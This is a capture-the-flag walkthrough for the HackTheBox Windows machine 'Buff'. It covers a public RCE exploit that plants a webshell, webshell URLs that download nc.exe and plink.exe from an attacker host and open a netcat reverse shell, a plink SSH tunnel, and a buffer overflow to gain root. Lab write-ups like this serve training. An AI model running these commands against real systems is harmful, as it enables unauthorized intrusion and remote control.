Buff is a Windows machine rated as “Easy” on HackTheBox weighed toward CVEs. Webshells, file transfers and SSH tunnel port forwarding.

After a quick scan for all ports, we see an Apache webserver with PHP on port 8080.

Nmap scan report for 10.x.x.x
Host is up (0.15s latency).
Not shown: 999 filtered ports
Some closed ports may be reported as filtered due to — defeat-rst-ratelimit
PORT STATE SERVICE VERSION
7680/tcp open pando-pub
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)

Browsing the web application, specifically the contact.php page, gives us a solid clue about the software in use.

A quick search on ExploitDB comes up with an unauthenticated remote code execution exploit. https://www.exploit-db.com/exploits/48506

After downloading the exploit to our attacker machine and making edits as needed, we can launch it and get a webshell on the victim webserver.

Using our uploaded webshell, we can now run some commands on the webserver. I recommend playing around with the webshell in a browser and see what commands work on the backend and what responses we can get. Grab the user flag.

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=type%20C:\Users\shaun\Desktop\user.txt

Next we want to get a reverse shell on the box. We will need to upload nc.exe and plink.exe Windows binaries to the machine (both are included with Kali Linux)

Using the webshell, we curl the executables onto the victim machine from our Kali Linux webserver.

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl%20http://10.10.14.220/nc.exe%20--output%20nc.exe

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl%20http://10.10.14.220/plink.exe%20--output%20plink.exe

Let’s also get winPEAS.bat on the system to automate local system enumeration looking for anything we can take advantage of for privilege escalation. https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASbat

Next let’s get a reverse shell, start a nc listener on Kali, i.e. port 7070:

nc -lvp 7070

Send a shell to our listener from the victim machine using the webshell:

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=nc.exe%20-nv%2010.10.14.220%207070%20-e%20cmd.exe

I ran winPEAS.bat to automate local enumeration. Looking through the results a process called CloudMe caught my attention, running on local port 8888. A search revealed a buffer overflow exploit affecting the service.

Next question was how do I hit this service only running on 127.0.0.1 from the kali. earlier we uploaded plink.exe binary. Using plink it’s possible to forward a locally listening port to a remote port and remote host (kali) via SSH tunnel. Making it accessible locally on the kali machine.

In the Windows shell,

plink.exe -ssh kali@10.10.14.220 -R 8888:127.0.0.1:8888

Login with kali creds and connection is forwarded to kali machine on 8888

Lastly, modify the shellcode in the buffer overflow exploit, start a listener and catch the root reverse shell.

AppSec & OffSec Engineering | DevSecOps | OSCP CISSP